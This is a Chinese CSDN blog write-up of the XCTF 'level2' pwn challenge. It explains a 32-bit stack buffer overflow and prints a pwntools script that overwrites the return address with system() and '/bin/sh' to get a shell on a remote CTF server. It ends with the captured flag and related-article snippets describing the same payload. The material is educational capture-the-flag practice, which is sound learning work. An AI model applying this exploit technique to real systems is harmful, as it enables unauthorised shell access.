xctf pwn level2

最新推荐文章于 2023-04-26 21:53:47 发布
最新推荐文章于 2023-04-26 21:53:47 发布
阅读量978 收藏
点赞数
分类专栏: 寒假任务 文章标签: debian 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64286326/article/details/122743922
版权

前言:只能说是看着WP侥幸做出来了,里面很多不懂的地方.

1 分析

首先下载把环境附件整下来

在linux下打开,checksec

32位的,拖进ida

 进去后汇编界面根本看不懂,F5查看伪代码

 

 用linux运行也是这样

 发现有一个vulnerable_function()函数,点进去看一下

 

我们可以看出来 栈顶和栈底相差0x88个字节,但是read()却是0x100个字节

 r,s分别是返回地址和栈底。

既然这样,我们可以利用栈溢出来getshell。

2 构造栈溢出

 1 我们先是找到/bin/sh 和 system的地址

 

 2 构造栈溢出代码

from pwn import *
context(os="linux",arch="amd64",log_lv2="debug")
hyang = 1
elf = ELF("lv2")

def main():
    if hyang == 1:
        io = remote("111.200.241.244",62999)
    else:
        io = process("lv2")
    
    sys_adr = elf.symbols["system"]
    shell_adr = elf.search("/bin/sh").next()
    callsys_adr = 0x0804a024
    
    payload = 'a' * (0x88 + 4) + p32(sys_adr) + p32(0) + p32(shell_adr)
    payload2 = 'a' * (0x88 + 4) + p32(callsys_adr) + p32(shell_adr)
    
    io.recvline()
    io.sendline(payload)
    io.interactive()

main()

 3 远程连接

 flag:cyberpeace{b25ce94b7c0eae8e0163f4a9456a5b71}

Hyang904
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level2
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-15 1408
攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF pwn level2
weixin_46128614的博客
02-03 386
使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点 然后存在system函数和字符/bin/sh 有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白 然后就是构造payload payload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...
XCTF PWN level2
prettyX的博客
06-10 232
查看基本信息 尝试运行 IDA F5 继续查看脆弱函数,88h的缓冲区可以写入0x100,发现溢出点 shift+F12,发现了“/bin/sh”
XCTF-PWN-level2-WP
l2645470582_的博客
08-02 198
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 4 3、该文件是32位文件,用32位IDA打开该文件 3.1、shift+f12查看关键字符串 我们看到"/bin/sh"的地址为:x0804A024 3.2、双击关键字符串,按Ctrl+x,再f5进入main函数的反汇编代码 3.3、我们看到关键函数vulnerable_function(),双击进入 3.4、我们看到buf溢出,双击buf查看字符串 buf:0x88...
攻防世界 Pwn level2
MrTreebook的博客
07-16 459
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
攻防世界pwn pwn_level2
qq_44370676的博客
08-14 301
首先下下来的文件查壳以及查保护机制
pwn level1、level2
qq_43613772的博客
07-24 961
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
攻防世界 - pwn - level2
qq726232111的博客
03-16 222
A、程序分析 1、使用了system() 2、read() -> 缓冲区溢出 3、 程序包含/bin/sh命令 B、利用分析 1、read(0,ebp-88h) --> payload ebp-88h --- ebp-1h (88hbyte 填充数据) ebp --- ebp+3h (4byte 填充...
攻防世界PWN-level2
Deeeelete的博客
11-13 723
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 545
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 653
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 833
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 440
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 492
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
pwn 例题level2解析
m0_67423114的博客
04-26 400
下面就是寻找bin/sh了,由于题目较为基础,我们甚至能够直接在源代码中找到/bin/sh,利用它和main函数已存在的system函数,即可凑齐构造payload的全部材料。看开头英文变量以及观察末尾,可知Frame Size大小为0x88,Saved regs大小为0x04,即需要写0x88+0x04个填充后才能到达返回地址。可以看到存在一个缓冲区buf,并且大小为0x88,并且该函数返回了一个read函数,大小为0x100u,双击&buf变量具体查看。通过这种套路,确实获得了/bin/sh的地址!
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值